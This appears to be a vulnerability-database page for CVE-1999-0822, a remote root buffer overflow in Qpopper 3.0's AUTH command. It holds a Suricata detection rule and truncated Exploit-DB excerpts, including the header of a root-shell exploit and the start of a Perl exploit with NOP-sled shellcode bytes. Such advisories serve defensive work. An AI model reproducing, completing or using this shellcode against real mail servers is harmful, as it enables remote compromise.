CVE-1999-0822
published 1999-11-30CVE-1999-0822: Buffer overflow in Qpopper (qpop) 3.0 allows remote root access via AUTH command.
PriorityP343critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
4.90%
91.0th percentile
Buffer overflow in Qpopper (qpop) 3.0 allows remote root access via AUTH command.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| qualcomm | qpopper | — | — |
| qualcomm | qpopper | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL POP3 AUTH overflow attempt
suricata·2010-09-23
CVE-1999-0822 GPL POP3 AUTH overflow attempt
GPL POP3 AUTH overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 110 (msg:"GPL POP3 AUTH overflow attempt"; flow:established,to_server; content:"AUTH"; nocase; isdataat:50,relative; pcre:"/^AUTH\s[^\n]{50}/smi"; reference:bugtraq,830; reference:cve,1999-0822; reference:nessus,10184; classtype:attempted-admin; sid:2101936; rev:10; metadata:created_at 2010_09_23, cve CVE_1999_0822, confidence Medium, signature_severity Major, updated_at 2024_03_08;)
Exploit-DB
Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (1)
exploitdb·1999-11-30
CVE-1999-0822 Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (1)
Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/830/info
There is a buffer overflow vulnerability present in current (3.x) versions of Qualcomm popper daemon. These vulnerabilities are remotely exploitable and since the daemon runs as root, the host running qpopper can be completely compromised anonymously. The problem is in pop_msg.c, around line 68 and is the result of vsprintf() or sprintf() calls without bounds checking.
/*
* Qpopper 3.0b remote exploit for x86 Linux (tested on RedHat/2.0.38)
*
* Dec 1999 by Mixter / http://1337.tsx.org
*
* Exploits pop_msg buffer overflow to spawn a remote root shell.
* This probably works with the old qpop2 code for bsd, solaris anyone?
*
* WARNING: YOU ARE USING THIS SOFTWARE ON
Exploit-DB
Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (2)
exploitdb·1999-11-30
CVE-1999-0822 Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (2)
Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (2)
---
source: https://www.securityfocus.com/bid/830/info
There is a buffer overflow vulnerability present in current (3.x) versions of Qualcomm popper daemon. These vulnerabilities are remotely exploitable and since the daemon runs as root, the host running qpopper can be completely compromised anonymously. The problem is in pop_msg.c, around line 68 and is the result of vsprintf() or sprintf() calls without bounds checking.
#!/usr/bin/perl
# *** Synnergy Networks
# * Description:
#
# Remote buffer overflow exploit for QPOP 3.0b | nc -v 110
# *** Synnergy Networks
$nop = "\x90";
#$offset = 0;
$shell = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa";
$shell .= "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04";
$shel
No writeups or analysis indexed.
1999-11-30
Published